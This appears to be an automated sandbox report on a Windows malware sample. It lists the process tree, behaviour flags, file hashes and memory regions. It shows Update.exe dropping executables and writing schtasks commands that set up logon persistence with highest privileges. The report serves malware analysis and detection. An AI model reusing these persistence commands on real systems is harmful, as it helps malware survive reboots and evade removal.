c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Users\Admin\AppData\Local\Temp\Update.exe"C:\Users\Admin\AppData\Local\Temp\Update.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-mtsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Update.exe" /rl HIGHEST /f2⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe"C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-mtsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Update.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Update.exe'" /sc onlogon /rl HIGHEST2⤵
- Creates scheduled task(s)
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000b4 000000801⤵
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000ec 000000801⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2012 -s 7122⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3500 -s 5963⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exeFilesize
409KB
MD593cd801b9e5e90edab480d3c1c135271
SHA1b0c7e918ade7a47916603ebd9eb1e3b4d78062c2
SHA25689996d761395b9e79589c4c7c93cc21ae2b5a00a9ba8c46abbf395954f3d0133
SHA512a5e207744fcb100fb24935ecda4c4214ac4cc7aca666b589fa1c451f1ad24c5a573cfe1b8150ac5510a866bb800251aa6ebf3fd685ed7a2e5fbc482791e143ed
-
C:\Windows\Temp\__PSScriptPolicyTest_d1dna5u5.3gv.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
memory/584-113-0x00007FF9B4FC0000-0x00007FF9B4FD0000-memory.dmpFilesize
64KB
-
memory/584-85-0x000001BA9DC30000-0x000001BA9DC5B000-memory.dmpFilesize
172KB
-
memory/584-76-0x000001BA9DC30000-0x000001BA9DC5B000-memory.dmpFilesize
172KB
-
memory/584-75-0x000001BA9DC30000-0x000001BA9DC5B000-memory.dmpFilesize
172KB
-
memory/584-91-0x00007FF9F4FD5000-0x00007FF9F4FD6000-memory.dmpFilesize
4KB
-
memory/584-74-0x000001BA9DC00000-0x000001BA9DC25000-memory.dmpFilesize
148KB
-
memory/584-114-0x000001BA9DC30000-0x000001BA9DC5B000-memory.dmpFilesize
172KB
-
memory/640-87-0x000002952BB00000-0x000002952BB2B000-memory.dmpFilesize
172KB
-
memory/640-105-0x00007FF9F4FD5000-0x00007FF9F4FD6000-memory.dmpFilesize
4KB
-
memory/640-99-0x00007FF9B4FC0000-0x00007FF9B4FD0000-memory.dmpFilesize
64KB
-
memory/640-98-0x000002952BB00000-0x000002952BB2B000-memory.dmpFilesize
172KB
-
memory/740-103-0x00000226AC250000-0x00000226AC27B000-memory.dmpFilesize
172KB
-
memory/740-125-0x00000226AC250000-0x00000226AC27B000-memory.dmpFilesize
172KB
-
memory/904-110-0x000001ED4B010000-0x000001ED4B03B000-memory.dmpFilesize
172KB
-
memory/2452-1-0x00000000734B0000-0x0000000073B9E000-memory.dmpFilesize
6.9MB
-
memory/2452-2-0x0000000005EF0000-0x00000000063EE000-memory.dmpFilesize
5.0MB
-
memory/2452-0-0x0000000000E40000-0x0000000000EAC000-memory.dmpFilesize
432KB
-
memory/2452-3-0x00000000033E0000-0x0000000003472000-memory.dmpFilesize
584KB
-
memory/2452-4-0x0000000005950000-0x0000000005960000-memory.dmpFilesize
64KB
-
memory/2452-5-0x0000000005960000-0x00000000059C6000-memory.dmpFilesize
408KB
-
memory/2452-6-0x0000000005E90000-0x0000000005EA2000-memory.dmpFilesize
72KB
-
memory/2452-7-0x0000000006880000-0x00000000068BE000-memory.dmpFilesize
248KB
-
memory/2452-20-0x00000000734B0000-0x0000000073B9E000-memory.dmpFilesize
6.9MB
-
memory/3500-742-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmpFilesize
1.9MB
-
memory/3500-748-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmpFilesize
1.9MB
-
memory/3500-768-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmpFilesize
1.9MB
-
memory/3704-102-0x0000000004C60000-0x0000000004C70000-memory.dmpFilesize
64KB
-
memory/3704-13-0x00000000734B0000-0x0000000073B9E000-memory.dmpFilesize
6.9MB
-
memory/3704-555-0x00000000734B0000-0x0000000073B9E000-memory.dmpFilesize
6.9MB
-
memory/3704-89-0x00000000734B0000-0x0000000073B9E000-memory.dmpFilesize
6.9MB
-
memory/3704-22-0x0000000006130000-0x000000000613A000-memory.dmpFilesize
40KB
-
memory/3704-14-0x0000000004C60000-0x0000000004C70000-memory.dmpFilesize
64KB
-
memory/4328-55-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4328-71-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4328-56-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4328-57-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4328-59-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4328-70-0x00007FF9F4AE0000-0x00007FF9F4B8E000-memory.dmpFilesize
696KB
-
memory/4328-68-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmpFilesize
1.9MB
-
memory/4328-129-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmpFilesize
1.9MB
-
memory/4328-67-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4588-27-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmpFilesize
9.9MB
-
memory/4588-66-0x00007FF9D8440000-0x00007FF9D8E2C000-memory.dmpFilesize
9.9MB
-
memory/4588-64-0x00007FF9F4AE0000-0x00007FF9F4B8E000-memory.dmpFilesize
696KB
-
memory/4588-65-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmpFilesize
1.9MB
-
memory/4588-54-0x00007FF9F4AE0000-0x00007FF9F4B8E000-memory.dmpFilesize
696KB
-
memory/4588-53-0x00007FF9F4F30000-0x00007FF9F510B000-memory.dmpFilesize
1.9MB
-
memory/4588-52-0x000002334E410000-0x000002334E43A000-memory.dmpFilesize
168KB
-
memory/4588-45-0x0000023335850000-0x0000023335860000-memory.dmpFilesize
64KB
-
memory/4588-33-0x000002334E090000-0x000002334E106000-memory.dmpFilesize
472KB
-
memory/4588-30-0x000002334DEE0000-0x000002334DF02000-memory.dmpFilesize
136KB
-
memory/4588-29-0x0000023335850000-0x0000023335860000-memory.dmpFilesize
64KB
-
memory/4588-28-0x0000023335850000-0x0000023335860000-memory.dmpFilesize
64KB